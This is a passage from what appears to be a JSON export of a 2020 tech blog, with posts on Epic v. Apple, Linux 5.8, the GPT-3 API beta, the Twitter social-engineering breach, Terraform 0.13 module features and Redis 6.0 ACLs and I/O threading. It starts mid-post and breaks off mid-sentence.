Let\u0026rsquo;s game out the scenarios. If Epic wins — either through the courts or by forcing Apple to negotiate — we could see a reduction in commission rates, the ability to use alternative payment processors, or even the opening of iOS to alternative app stores. Any of these would be significant for the developer ecosystem and represent a shift in platform consolidation dynamics.\nIf Apple wins, the status quo continues, but with even more legal precedent backing Apple\u0026rsquo;s position. This would solidify the current model and potentially embolden similar gatekeeping on other platforms.\nThe most likely outcome, in my estimation, is somewhere in the middle. Apple has already made small concessions recently — reducing the commission to 15% for subscription renewals after the first year, for instance. A broader reduction or the introduction of a tiered commission structure seems plausible, especially with regulatory pressure mounting from the EU.\nWhat I don\u0026rsquo;t expect is the complete dismantling of Apple\u0026rsquo;s walled garden. Apple will argue — correctly, in some respects — that its review process and distribution infrastructure provide real value: security screening, payment processing, global distribution, and consumer trust. The question is whether that value justifies a 30% tax and the restrictions that come with it.\nWhat Developers Should Do Right Now # Practically speaking, nothing changes immediately. This legal battle will play out over months, possibly years. But there are some prudent steps to consider.\nFirst, if you haven\u0026rsquo;t already, invest in your web experience. Progressive Web Apps have been improving steadily, and having a strong web fallback reduces your dependency on any single app store. I\u0026rsquo;ve been advocating for this approach with my teams for years, and the current situation only reinforces that position.\nSecond, architect your payment systems for flexibility. Abstract your payment processing behind clean interfaces so that if the rules change, you can adapt quickly. Don\u0026rsquo;t hard-code assumptions about commission rates or payment flows.\nThird, pay attention to the regulatory landscape. The EU\u0026rsquo;s Digital Markets Act is taking shape, and similar legislation is being discussed in the US, Australia, and elsewhere. The rules governing platform businesses are likely to evolve significantly in the coming years.\nMy Take # I have mixed feelings about this situation. Apple built an extraordinary platform and invested heavily in the ecosystem that makes iOS development viable. They deserve compensation for that. But 30% feels excessive for what is, at this point, largely automated distribution. And the restrictions on communication between developers and their own customers feel paternalistic at best.\nEpic isn\u0026rsquo;t a scrappy underdog — they\u0026rsquo;re a multi-billion dollar company making a calculated business move. But the outcome of this fight will disproportionately benefit smaller developers who don\u0026rsquo;t have the resources to challenge Apple on their own. Sometimes it takes a giant to fight a giant on behalf of everyone else.\nWhatever happens, I\u0026rsquo;m glad this conversation is finally happening in a courtroom rather than just on forums and Twitter threads. The relationship between platforms and the developers who build on them is too important to be governed solely by the platform\u0026rsquo;s terms of service.\n","date":"13 August 2020","externalUrl":null,"permalink":"/posts/200813-epic-vs-apple-developer-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Epic Games just declared war on Apple’s App Store policies. The implications for the developer ecosystem extend far beyond gaming.","title":"Epic vs. Apple — What the Fortnite Fight Means for Developers","type":"posts"},{"content":"Linux 5.8 dropped on August 2nd, and Linus Torvalds wasn\u0026rsquo;t shy about its significance. In his release announcement, he called it \u0026ldquo;one of our biggest releases of all time\u0026rdquo; based on the sheer number of commits — over 14,000 non-merge commits touching nearly 20% of all files in the kernel tree. Having followed kernel development for the better part of two decades, I can confirm: this is an unusually large release, even by Linux standards.\nThe Numbers Behind the Hype # To put 5.8 in context, this release saw contributions from over 1,900 developers across 200+ companies. The diffstat shows approximately 800,000 lines added and 200,000 lines removed. That\u0026rsquo;s a net addition of 600,000 lines in a single release cycle — roughly two months of development.\nWhat drove this volume? A confluence of factors. Several major subsystem overhauls landed simultaneously, and the ongoing work to remove legacy code while adding new hardware support created a perfect storm of changes. The kernel\u0026rsquo;s development model, where maintainers collect patches in their own trees and submit pull requests during the merge window, means that sometimes multiple large efforts converge in the same release.\nFor those of us who rely on Linux in production (which, let\u0026rsquo;s be honest, is most backend developers at this point), the scale of change might sound alarming. But the kernel\u0026rsquo;s testing infrastructure and staged release process — with multiple release candidates over several weeks — means that by the time 5.8 reaches stable, it\u0026rsquo;s been thoroughly exercised. The process works, even when the changeset is enormous.\nKey Changes That Matter for Developers # Thunderbolt and USB4 support got a significant overhaul, with the Thunderbolt driver being moved out of its standalone position and integrated more deeply into the kernel\u0026rsquo;s bus infrastructure. This is forward-looking work that prepares Linux for the next generation of high-speed connectivity, and it\u0026rsquo;s the kind of infrastructure investment that pays dividends for years.\nThe new fanotify features are particularly relevant for anyone building file monitoring or security tools. The filesystem notification API now supports additional event types and improved filtering, making it easier to build efficient file-watching systems without resorting to inotify hacks or periodic polling. If you\u0026rsquo;ve ever built a deployment watcher or log rotator, you know how much these improvements matter.\nKernel concurrency sanitizer (KCSAN) enhancements continue to improve the kernel\u0026rsquo;s ability to detect data races at runtime. As someone who has debugged more than their share of race conditions, I appreciate any tooling that makes these bugs easier to find. KCSAN is part of a broader trend toward building safety nets directly into the development and testing workflow.\nThe energy-aware scheduling improvements are worth noting too, especially if you\u0026rsquo;re running workloads on ARM-based servers or edge devices. The scheduler now makes smarter decisions about task placement across heterogeneous CPU cores, balancing performance against power consumption. With ARM servers gaining traction in data centers, this work is increasingly relevant beyond embedded systems.\nThe Shadow of Inclusivity Discussions # It\u0026rsquo;s worth mentioning that 5.8 also includes changes to the kernel\u0026rsquo;s terminology, replacing terms like \u0026ldquo;master/slave\u0026rdquo; and \u0026ldquo;blacklist/whitelist\u0026rdquo; with more neutral alternatives. This follows similar moves by other major open source projects, including Git\u0026rsquo;s switch to main as the default branch name.\nI\u0026rsquo;ve seen heated debates about these changes in various forums. From a purely pragmatic engineering perspective, the technical impact is minimal — it\u0026rsquo;s mostly documentation and variable naming. The social impact, however, is meaningful to the people these terms affect. In a project with nearly 2,000 contributors per release, fostering an inclusive environment isn\u0026rsquo;t just a nice-to-have; it\u0026rsquo;s a prerequisite for attracting and retaining talent.\nAs someone who has managed development teams across multiple countries and cultures, I\u0026rsquo;ve learned that the small signals you send about inclusivity compound over time. The code works the same regardless of what you name your variables, but the community doesn\u0026rsquo;t.\nMy Take # Linux 5.8 is a solid release that reflects the kernel project\u0026rsquo;s continued maturity. The scale is impressive, but what impresses me more is the process that makes such large releases possible without compromising stability. The kernel development model — while sometimes messy and contentious — remains one of the most effective large-scale software engineering efforts in history.\nFor most developers and operators, the upgrade path is straightforward. Unless you\u0026rsquo;re running cutting-edge hardware or need specific features from 5.8, there\u0026rsquo;s no rush to upgrade — your distribution will pick it up in due course. But if you\u0026rsquo;re doing kernel development or contributing to the ecosystem, the size of this release is a reminder that there\u0026rsquo;s always room for more contributors. The kernel\u0026rsquo;s appetite for good patches is effectively unlimited.\nWhat I find most exciting is the continued investment in testing and debugging infrastructure. KCSAN, improved selftests, and better CI integration signal a project that\u0026rsquo;s taking code quality seriously at scale. In a codebase this large, that\u0026rsquo;s not just admirable — it\u0026rsquo;s essential.\n","date":"6 August 2020","externalUrl":null,"permalink":"/posts/200806-linux-kernel-5-8-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Linux 5.8 lands with a massive changeset. Linus Torvalds himself says it’s one of the biggest releases of all time — here’s what developers should care about.","title":"Linux 5.8 — Linus Calls It One of the Biggest Releases Ever","type":"posts"},{"content":"Over the past few weeks, my Twitter feed has been flooded with GPT-3 demos. Developers generating React components from plain English descriptions, writing SQL queries from natural language, even producing passable marketing copy — all through OpenAI\u0026rsquo;s new API that\u0026rsquo;s been rolling out in private beta since June. As I discussed in my initial look at the beta, and the broader language model that garnered significant attention earlier this year, these capabilities have been progressing rapidly. After thirty years in this industry, I\u0026rsquo;ve learned to be skeptical of hype cycles, but I have to admit: some of these demos are genuinely impressive.\nWhat Makes GPT-3 Different # GPT-3 is the third generation of OpenAI\u0026rsquo;s Generative Pre-trained Transformer model, and it\u0026rsquo;s a massive leap in scale. We\u0026rsquo;re talking about 175 billion parameters — that\u0026rsquo;s over 100 times larger than GPT-2, which itself was considered enormous when it launched last year. The model was trained on a diverse corpus of internet text, books, and other sources, giving it a remarkably broad understanding of language patterns. The emergence of this technology is reshaping developer expectations about what tools can do for AI-assisted development.\nWhat\u0026rsquo;s particularly interesting from an engineering perspective is the \u0026ldquo;few-shot learning\u0026rdquo; capability. Rather than fine-tuning the model for specific tasks (which was the standard approach with GPT-2 and BERT), you can simply provide GPT-3 with a few examples in your prompt, and it generalizes from there. This is a fundamental shift in how we interact with language models. You\u0026rsquo;re essentially programming with natural language, and the API makes this accessible to any developer who can make an HTTP request.\nThe API itself is clean and straightforward — you send a prompt, specify parameters like temperature and max tokens, and get back generated text. OpenAI has done a solid job making what is an incredibly complex system feel approachable. I\u0026rsquo;ve seen developers with no ML background building functional prototypes within hours of getting access.\nThe Demos Worth Paying Attention To # Among the flood of demos, a few stand out for their practical implications. Sharif Shameem\u0026rsquo;s layout generator takes a plain English description and produces JSX code — describing a button with specific styling and getting working React components back. It\u0026rsquo;s not perfect, but it\u0026rsquo;s remarkably close for a general-purpose language model.\nThere\u0026rsquo;s also the spreadsheet function generator, where you describe what you want a formula to do, and GPT-3 produces the correct Excel or Google Sheets formula. For anyone who\u0026rsquo;s spent time deciphering nested VLOOKUP statements, this feels like genuine progress.\nBut the demo that caught my engineering eye is code generation from docstrings. Write a Python function\u0026rsquo;s docstring describing what it should do, and GPT-3 fills in the implementation. It works for simple functions with surprising accuracy. For complex logic, it still falls short, but the trajectory here is clear.\nThe Limitations Nobody\u0026rsquo;s Tweeting About # Here\u0026rsquo;s where my decades of experience make me pump the brakes. GPT-3 is a statistical pattern matcher, not a reasoning engine. It generates text that looks correct based on patterns in its training data. This distinction matters enormously in production systems.\nThe model has no concept of factual accuracy. It will confidently generate plausible-sounding but completely wrong information. In a code generation context, it might produce syntactically valid code that has subtle logical errors — the kind that pass a code review but fail in production at 3 AM. I\u0026rsquo;ve seen enough \u0026ldquo;it works on my machine\u0026rdquo; situations to know that confident-looking output is sometimes the most dangerous kind.\nThere\u0026rsquo;s also the cost and latency question. Running inference on a 175-billion parameter model isn\u0026rsquo;t cheap, and the API reflects that. For anything beyond prototypes and demos, you need to think carefully about where this fits in your architecture and whether the cost-per-request makes sense for your use case.\nAnd then there\u0026rsquo;s the elephant in the room: bias. The model was trained on internet text, which means it has absorbed the biases present in that data. OpenAI acknowledges this, but for any production application, you\u0026rsquo;d need robust filtering and validation layers — adding complexity and cost.\nMy Take # I\u0026rsquo;m genuinely excited about GPT-3, but in a measured way. The technology is remarkable, and the API-first approach means developers can start experimenting immediately. But I\u0026rsquo;ve been through enough hype cycles — from expert systems in the \u0026rsquo;90s to blockchain in 2017 — to know that the gap between impressive demos and reliable production systems is wide.\nWhere I see real near-term value is in developer tooling: code completion, documentation generation, boilerplate scaffolding. These are contexts where a human is always in the loop to catch errors, and the cost of a mistake is low. Using GPT-3 to generate customer-facing content or make automated decisions? We\u0026rsquo;re not there yet, and anyone claiming otherwise hasn\u0026rsquo;t thought through the failure modes.\nThe bigger picture is what excites me most. GPT-3 demonstrates that scaling up language models produces emergent capabilities that weren\u0026rsquo;t present at smaller scales. The growing developer ecosystem around GPT-3 is exploring exactly these possibilities. If this trend continues — and there\u0026rsquo;s no reason to think it won\u0026rsquo;t — the next few years in AI could be transformative for how we build software.\nFor now, I\u0026rsquo;d recommend getting on the API waitlist if you haven\u0026rsquo;t already, and starting to think about where natural language interfaces could complement your existing tools. Just don\u0026rsquo;t bet your production architecture on it yet.\n","date":"30 July 2020","externalUrl":null,"permalink":"/posts/200730-gpt3-api-first-look/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s GPT-3 API is generating jaw-dropping demos across the developer community. Here’s what it means for the rest of us.","title":"GPT-3 — The API That Has Everyone Talking","type":"posts"},{"content":"Last week I got access to the GPT-3 API beta. Like many developers, I\u0026rsquo;d been watching the demos circulating on Twitter with a mixture of fascination and skepticism — GPT-3 generating working React components from natural language descriptions, writing SQL queries from plain English, and producing surprisingly coherent essays on arbitrary topics. The model itself had generated significant interest when the paper was published two months earlier. The demos looked almost too good. So I spent the past week testing it systematically, and I want to share what I\u0026rsquo;ve found beyond the cherry-picked screenshots.\nOpenAI is offering API access to several model sizes: davinci (the full 175 billion parameter model), curie, babbage, and ada (progressively smaller and faster). Most of the impressive demos use davinci. The API itself is straightforward — you send a text prompt and get a completion back. The magic, as it turns out, is entirely in how you construct the prompt.\nWhat Actually Works Well # Code generation from descriptions is genuinely useful, with caveats. I gave GPT-3 prompts like \u0026ldquo;Write a Python function that takes a list of dictionaries and returns a new list sorted by the \u0026lsquo;date\u0026rsquo; key in descending order\u0026rdquo; and consistently got working code back. For straightforward utility functions — string manipulation, data transformation, simple algorithms — it\u0026rsquo;s remarkably reliable.\nWhere it gets interesting is prompt engineering. If you provide a few examples of input-output pairs (what OpenAI calls \u0026ldquo;few-shot learning\u0026rdquo;), the accuracy improves dramatically. Instead of just describing what you want, you show the model two or three examples, and it extrapolates the pattern. For instance, show it three examples of a natural language query and the corresponding SQL, and it can generate SQL for a fourth query with surprising accuracy.\nText transformation is another strong suit. I\u0026rsquo;ve been using it to convert verbose documentation into concise summaries, reformat data between structures (JSON to YAML, XML to JSON), and generate documentation from code comments. These are tasks that are tedious for humans but well within GPT-3\u0026rsquo;s capabilities.\nNatural language interfaces feel more achievable now than they ever have. Building a system where users type \u0026ldquo;show me all orders from last month over $100 sorted by date\u0026rdquo; and the system translates that to a database query is no longer a research project — it\u0026rsquo;s an API call with some prompt engineering.\nWhere It Falls Down # Factual accuracy is a serious problem. GPT-3 generates plausible-sounding text that is frequently wrong. I asked it to explain specific library APIs, and it invented functions that don\u0026rsquo;t exist. I asked about historical events and got dates wrong. It confidently states incorrect information with the same tone it uses for correct information. There\u0026rsquo;s no uncertainty signal.\nThis isn\u0026rsquo;t a minor limitation — it fundamentally constrains the use cases. You cannot use GPT-3 as a knowledge base. You cannot trust its output without verification. For code generation, this means the generated code must be tested, not just skimmed. For text generation, every factual claim needs checking.\nConsistency over long outputs degrades. For short completions (a paragraph, a function), GPT-3 is coherent. For longer outputs, it starts to contradict itself, repeat phrases, or drift off-topic. The model has no persistent memory — each API call is stateless, and while you can include previous context in the prompt, you\u0026rsquo;re limited by the token window (currently 2048 tokens for most models, 4096 for davinci).\nCost is non-trivial. Davinci, the most capable model, costs $0.06 per 1,000 tokens (roughly 750 words). For interactive applications where each user query might consume 500-1000 tokens in prompt and completion, the per-query cost adds up quickly. The smaller models are much cheaper but notably less capable. Finding the right model-cost trade-off for production use will be an engineering challenge.\nThe Prompt Engineering Discipline # What strikes me most about working with GPT-3 is that effective use requires a new skill that doesn\u0026rsquo;t map neatly onto existing engineering disciplines. Prompt engineering — crafting the input text to reliably produce the desired output — is part copywriting, part programming, and part empirical science.\nA naive prompt like \u0026ldquo;Write a Python web scraper\u0026rdquo; produces mediocre results. A well-crafted prompt that specifies the library to use, provides an example of the desired output format, and includes constraints (\u0026ldquo;handle pagination, use rate limiting, log errors to stderr\u0026rdquo;) produces dramatically better code. The difference between a good prompt and a bad one can be the difference between a useful tool and a party trick.\nI\u0026rsquo;ve started maintaining a library of effective prompts — templates for different tasks that I can adapt. This feels like the early days of SQL or regex: a skill that starts as arcane knowledge and gradually becomes a standard part of the developer toolkit.\nImplications for Software Development # I don\u0026rsquo;t think GPT-3 is going to replace developers. But I do think it\u0026rsquo;s going to change how we work. Here are the near-term applications I\u0026rsquo;m most excited about:\nCode scaffolding: generating boilerplate code, tests, and documentation from high-level descriptions. Not replacing the thinking, but eliminating the typing.\nInternal tools: building natural language interfaces for databases and APIs that non-technical team members can use without learning SQL or API syntax.\nData transformation: converting between formats, generating sample data, and building migration scripts from examples rather than specifications.\nLearning aid: explaining unfamiliar code, suggesting improvements, and answering \u0026ldquo;how do I do X in language Y\u0026rdquo; questions with working examples.\nMy Take # GPT-3 is the most impressive language model I\u0026rsquo;ve worked with, and it\u0026rsquo;s not close. The jump from GPT-2 to GPT-3 is qualitatively different — it\u0026rsquo;s not just better at the same tasks, it can do tasks that GPT-2 simply couldn\u0026rsquo;t.\nBut the hype is outrunning the reality. The Twitter demos showing GPT-3 building entire applications from a one-sentence description are cherry-picked best cases, and they omit the many failed attempts that preceded the screenshot-worthy success. In practice, GPT-3 is a powerful but unreliable tool that requires careful prompt design, output validation, and realistic expectations.\nThe API pricing also signals that this is a premium tool, not a utility. For high-value use cases where the cost per query is justified — code generation in an IDE, natural language database queries for business users, content summarization — GPT-3 can deliver real value today. For high-volume, low-margin applications, the economics don\u0026rsquo;t yet work.\nI\u0026rsquo;m going to keep experimenting. There\u0026rsquo;s something genuinely exciting about a tool that can understand and generate code and natural language with this level of fluency. But I\u0026rsquo;m keeping my expectations grounded in what I\u0026rsquo;ve actually tested, not what the demos promise. The broader implications of this technology and the emerging developer ecosystem will shape how we integrate AI into software development for years to come.\n","date":"23 July 2020","externalUrl":null,"permalink":"/posts/200723-gpt3-api-beta-first-impressions/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI is granting beta access to the GPT-3 API. After a week of experimentation, here’s what’s genuinely impressive and what’s overhyped.","title":"GPT-3 API Access — First Impressions from the Beta","type":"posts"},{"content":"Yesterday, Twitter experienced what is arguably the most high-profile security breach in social media history. The accounts of Barack Obama, Joe Biden, Elon Musk, Bill Gates, Apple, Uber, and dozens of other verified accounts simultaneously posted bitcoin scam messages promising to double any bitcoin sent to a specific address. Within hours, the scam wallet had received over $100,000 in bitcoin.\nTwitter\u0026rsquo;s response was extraordinary in its severity: they temporarily disabled the ability for all verified accounts to tweet. Think about that. One of the largest communication platforms on earth had to silence its most prominent users because they couldn\u0026rsquo;t trust their own internal access controls.\nThe details are still emerging, but what we know so far points to a social engineering attack that compromised Twitter\u0026rsquo;s internal admin tools. This wasn\u0026rsquo;t a sophisticated zero-day exploit. It was people being tricked into giving access to systems they shouldn\u0026rsquo;t have been able to reach in the first place.\nInternal Tools Are the Soft Underbelly # Every large technology company has internal admin tools — dashboards and APIs that let employees manage user accounts, investigate abuse reports, and handle customer support requests. These tools typically have far more power than any public API. At Twitter, the internal tools apparently allow staff to post tweets on behalf of any account, change associated email addresses, and disable two-factor authentication.\nThe existence of such tools isn\u0026rsquo;t surprising. Every platform at scale needs them. What\u0026rsquo;s concerning is the access model. The screenshots circulating on social media (before Twitter aggressively removed them) show an internal dashboard with remarkably broad capabilities and, apparently, insufficient access restrictions.\nIn a well-designed system, the principle of least privilege means that a customer support agent can view account details but not post tweets. A security investigator might be able to lock an account but not change its email. The ability to impersonate a user and post as them should require multiple approvals and be logged with extreme scrutiny.\nWhether Twitter\u0026rsquo;s tools had these controls and they were bypassed, or whether the controls didn\u0026rsquo;t exist, is the critical question. Neither answer is comforting.\nSocial Engineering Scales Better Than Exploits # The security industry spends billions on firewalls, intrusion detection systems, vulnerability scanners, and endpoint protection. These are all important. But the attack vector that consistently works — year after year, breach after breach — is convincing a human to do something they shouldn\u0026rsquo;t.\nSocial engineering attacks against employees are devastatingly effective because they exploit the gap between security policies and daily workflow. An employee who receives what appears to be a legitimate IT request to verify their credentials, especially when working from home during a pandemic and communicating primarily through Slack and email, is in a difficult position. The cues we rely on to detect deception — body language, familiar faces, physical presence — are absent in remote work.\nThis Twitter breach reportedly involved targeting a small number of Twitter employees, possibly through phone-based social engineering (vishing). The attackers didn\u0026rsquo;t need to find a buffer overflow or an unpatched server. They needed to find one person who would share credentials or perform an action on their internal system.\nThe Access Control Questions Every Company Should Ask # This incident should prompt every technology company to audit their internal tooling:\nWho can access admin tools? Not who should be able to, but who actually can right now. In my experience, the delta between these two lists is always larger than leadership expects. Permissions accumulate over time as people change roles, and revocation is rarely as prompt as provisioning.\nWhat can each access level do? Can a Tier 1 support agent perform the same actions as a senior security engineer? Are destructive or impersonation actions gated behind additional authentication?\nIs there a break-glass procedure? For truly sensitive actions — posting as a user, changing account recovery information, disabling 2FA — is there a multi-person approval requirement? Is there a tamper-evident audit log?\nHow are internal tools authenticated? Are they behind a VPN with MFA? Is the MFA phishing-resistant (hardware keys) or phishable (SMS/TOTP)? With the shift to remote work, many companies relaxed VPN requirements for internal tools. That decision has consequences.\nCan you detect anomalous internal tool usage? If someone uses the admin tool to modify 30 high-profile accounts in 20 minutes, does an alert fire? Or does that look like normal support activity?\nThe Bigger Implication # The bitcoin scam was, frankly, a low-ambition use of the access these attackers had. They could post as the former President of the United States. They could read the direct messages of politicians, journalists, executives, and activists. They could change the email addresses on accounts and lock out the real owners permanently.\nThat they used this access for a relatively crude cryptocurrency scam suggests either limited sophistication or limited imagination. A state-sponsored actor with the same access would have used it very differently — and we might never have known about it.\nThis is the thought that should keep security professionals up at night: how many breaches of internal tools have happened without anyone posting an obvious bitcoin scam that blew the cover? If the attackers had simply read DMs and exfiltrated data quietly, would Twitter have detected it?\nMy Take # The Twitter hack is a wake-up call, but I worry it\u0026rsquo;s one the industry will snooze through. We\u0026rsquo;ve had similar wake-up calls before — the 2019 Capital One breach (misconfigured internal AWS credentials), the 2018 Marriott breach (compromised internal Starwood systems), the 2017 Equifax breach (unpatched internal-facing server). Each time, the industry nods solemnly, publishes blog posts about zero trust architecture, and then goes back to business as usual.\nWhat would actually help: mandatory hardware security keys for all employees with access to production systems. Behavioral analytics on internal tool usage. Mandatory multi-person approval for sensitive actions. Regular red-team exercises specifically targeting internal tools via social engineering.\nThese aren\u0026rsquo;t novel recommendations. They\u0026rsquo;re well-understood practices that most companies haven\u0026rsquo;t implemented because they\u0026rsquo;re expensive, they slow things down, and until something goes wrong, the risk feels theoretical.\nToday, for Twitter, it\u0026rsquo;s very real. Tomorrow, it could be anyone.\n","date":"16 July 2020","externalUrl":null,"permalink":"/posts/200716-twitter-bitcoin-hack-social-engineering/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The massive Twitter compromise that hit Barack Obama, Elon Musk, and Apple wasn’t a sophisticated zero-day — it was social engineering targeting internal tools. That’s the scary part.","title":"The Twitter Bitcoin Hack — A Social Engineering Masterclass","type":"posts"},{"content":"HashiCorp released the first beta of Terraform 0.13 this week, and the headline feature has been on the community\u0026rsquo;s wish list for years: count and for_each support at the module level. If you\u0026rsquo;ve been writing Terraform professionally, you know exactly why this matters. If you haven\u0026rsquo;t, let me explain why infrastructure teams are quietly celebrating.\nThe Module Iteration Problem # Since Terraform introduced modules — reusable packages of infrastructure configuration — there\u0026rsquo;s been one glaring limitation. You could use count and for_each to create multiple instances of a resource, but not of a module. This meant that if you had a well-crafted module for, say, a standard web application stack (load balancer, compute instances, database, DNS records), and you wanted to deploy three instances of it for three different services, you had to write:\nmodule \u0026#34;app_service_a\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; name = \u0026#34;service-a\u0026#34; # ... all the variables } module \u0026#34;app_service_b\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; name = \u0026#34;service-b\u0026#34; # ... all the same variables, copied } module \u0026#34;app_service_c\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; name = \u0026#34;service-c\u0026#34; # ... and again } This wasn\u0026rsquo;t just ugly — it was a maintenance nightmare. Every time the module\u0026rsquo;s interface changed, you had to update every copy. In large organizations with dozens or hundreds of similar deployments, this led to either massive code duplication or elaborate workarounds using terragrunt or code generation scripts.\nTerraform 0.13 fixes this cleanly:\nmodule \u0026#34;app\u0026#34; { source = \u0026#34;./modules/web-app\u0026#34; for_each = var.services name = each.key config = each.value } Three lines instead of thirty. And more importantly, adding a new service is a data change, not a code change. You add an entry to the services variable, and Terraform creates the entire stack.\nAutomatic Provider Installation # The second major change is how Terraform handles providers. In 0.12 and earlier, terraform init downloads providers from a monolithic namespace. All providers lived under hashicorp/ in the Terraform Registry, even community-maintained ones. This created confusion about ownership and support levels.\nTerraform 0.13 introduces a new provider source syntax that uses a full namespace:\nterraform { required_providers { aws = { source = \u0026#34;hashicorp/aws\u0026#34; version = \u0026#34;~\u0026gt; 3.0\u0026#34; } datadog = { source = \u0026#34;DataDog/datadog\u0026#34; version = \u0026#34;~\u0026gt; 2.12\u0026#34; } } } This is more than cosmetic. It enables a truly decentralized provider ecosystem where anyone can publish and maintain providers under their own namespace. Vendors can own their Terraform providers directly, publish updates on their own schedule, and maintain them without going through HashiCorp\u0026rsquo;s release process.\nFor teams that build internal providers — and I know several that do — this is significant. You can now host providers in a private registry and reference them with clear namespacing. No more confusion about whether terraform-provider-custom-thing is the official version or someone\u0026rsquo;s fork.\nCustom Validation Rules # A smaller but useful addition is custom validation rules for variables:\nvariable \u0026#34;instance_type\u0026#34; { type = string validation { condition = can(regex(\u0026#34;^t3\\\\.\u0026#34;, var.instance_type)) error_message = \u0026#34;Instance type must be from the t3 family for cost control.\u0026#34; } } This moves validation left — catching configuration errors at terraform plan time rather than at apply time (or worse, in production). I\u0026rsquo;ve seen teams build elaborate CI checks and wrapper scripts to validate Terraform variables. Having it built into the language is cleaner and more discoverable.\nThe validation rules support arbitrary conditions using Terraform\u0026rsquo;s expression language, so you can enforce naming conventions, restrict resource sizes, validate CIDR ranges, or any other policy that can be expressed as a boolean condition.\ndepends_on for Modules # Another long-requested feature: modules now support depends_on. In complex infrastructures, you sometimes need to ensure that one module completes before another starts, even when there\u0026rsquo;s no direct data dependency between them. A common example is a networking module that creates a VPC and a monitoring module that needs the VPC\u0026rsquo;s NAT gateway to be functional before it can reach external endpoints.\nPreviously, you\u0026rsquo;d create artificial data dependencies — passing an output from module A to a variable in module B that module B didn\u0026rsquo;t actually use, just to force ordering. It worked, but it was confusing for anyone reading the code later.\nNow you can express intent directly:\nmodule \u0026#34;monitoring\u0026#34; { source = \u0026#34;./modules/monitoring\u0026#34; depends_on = [module.networking] } The Upgrade Path # Terraform 0.13 includes an 0.13upgrade command that automatically rewrites your configuration files to use the new provider source syntax. In my testing, it handles straightforward configurations well. Complex setups with multiple provider aliases or unusual provider inheritance patterns may need manual attention.\nThe state format is also changing, which means you\u0026rsquo;ll need to run terraform state replace-provider for any existing state files. HashiCorp provides tooling for this, but it\u0026rsquo;s worth testing thoroughly in a non-production environment first. I\u0026rsquo;ve been bitten by state migration issues in previous Terraform upgrades, and a corrupted state file at 3 AM is nobody\u0026rsquo;s idea of a good time.\nMy Take # Terraform 0.13 addresses the most common complaints I hear from teams using Terraform at scale. Module iteration alone will eliminate thousands of lines of duplicated configuration across the industry. The provider namespace change sets up the ecosystem for sustainable growth. Custom validation rules reduce the need for external policy tools (though they don\u0026rsquo;t replace them — tools like Open Policy Agent still have a role for cross-resource and cross-module policies).\nIf you\u0026rsquo;re on Terraform 0.12, I\u0026rsquo;d recommend starting your upgrade planning now. Test with the beta, identify any breaking changes in your workflows, and plan a migration window. The features are worth the effort, and the longer you wait, the more state drift you\u0026rsquo;ll accumulate between your 0.12 and 0.13 configurations.\nInfrastructure as code keeps getting better. The gap between \u0026ldquo;configuration management\u0026rdquo; and \u0026ldquo;real programming language\u0026rdquo; continues to narrow, and that\u0026rsquo;s good for everyone who manages cloud infrastructure.\n","date":"9 July 2020","externalUrl":null,"permalink":"/posts/200709-terraform-013-module-foreach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Terraform 0.13 brings count and for_each to modules, automatic provider installation, and custom validation rules. A look at what changes in practice.","title":"Terraform 0.13 — Module-Level For Each and the Provider Story","type":"posts"},{"content":"Redis 6.0 has been GA for a couple of months now, and I\u0026rsquo;ve been running it in production across three projects since the RC phase. The headline features — access control lists and I/O threading — sound like incremental improvements, but they represent a significant shift in how Redis positions itself for production workloads. After years of \u0026ldquo;just put it behind a firewall,\u0026rdquo; Redis is finally getting serious about security and scalability.\nACLs: Better Late Than Never # For the entire history of Redis up to version 5, security was essentially a single shared password set via requirepass. Every client that connected had full access to every command and every key. If your application needed Redis for caching and your analytics pipeline also needed Redis, they shared the same credentials and the same permission level. One misconfigured analytics job could FLUSHALL your production cache.\nThe community worked around this with network segmentation, separate Redis instances, and the rename-command directive (which is a hack, not a security model). But these workarounds don\u0026rsquo;t scale, and they don\u0026rsquo;t meet the compliance requirements that more enterprises are imposing on their infrastructure.\nRedis 6.0\u0026rsquo;s ACL system changes this fundamentally. You can now create named users with specific permissions:\nACL SETUSER analytics on \u0026gt;analytics_password ~analytics:* +get +set +del -flushall This creates a user analytics that can only access keys prefixed with analytics: and can only run GET, SET, and DEL — no FLUSHALL, no KEYS *, no DEBUG. This is basic stuff for a database, but for Redis, it\u0026rsquo;s transformative.\nI\u0026rsquo;ve been using ACLs to separate concerns in a multi-service architecture where different microservices access different key namespaces. The session service gets access to session:* keys. The rate limiter gets ratelimit:*. The cache layer gets cache:*. If a service is compromised, the blast radius is contained, a principle critical to defense-in-depth security.\nThe implementation is clean. ACLs can be defined in a file and loaded at startup, or managed dynamically via commands. There\u0026rsquo;s an ACL LOG that records denied operations, which is invaluable for debugging permission issues during rollout.\nI/O Threading: Understanding What It Actually Does # The threading story in Redis 6.0 is widely misunderstood. Redis is not becoming a multi-threaded database. The core command execution is still single-threaded — one thread processes commands sequentially, which is what gives Redis its consistency guarantees and simplicity.\nWhat is threaded now is I/O: reading data from client sockets and writing responses back. On a busy Redis instance handling tens of thousands of connections, the I/O overhead of parsing incoming commands and serializing responses can become a bottleneck before the CPU-bound command execution does. The I/O threads handle this parsing and serialization work in parallel, then hand off the parsed commands to the main thread for execution.\nIn my benchmarks, enabling I/O threads (I\u0026rsquo;m using 4 threads on an 8-core machine) improved throughput by roughly 40-60% for workloads that are heavy on small commands — think high-frequency GET/SET operations from many concurrent clients. For workloads dominated by large values or complex commands like ZUNIONSTORE, the improvement is smaller because the bottleneck is in command execution, not I/O.\nTo enable it, add to your redis.conf:\nio-threads 4 io-threads-do-reads yes A word of caution: don\u0026rsquo;t just set io-threads to your total CPU count. The main execution thread still needs a core, and you want headroom for background tasks like RDB persistence and AOF rewriting. I\u0026rsquo;ve found that setting I/O threads to roughly half your available cores gives the best results.\nTLS Native Support # Redis 6.0 also adds native TLS support, which eliminates the need for stunnel or other TLS proxies in front of Redis. This is another \u0026ldquo;finally\u0026rdquo; feature. Running Redis without encryption in transit has been a persistent compliance headache, and the stunnel workaround adds latency and operational complexity.\nEnabling 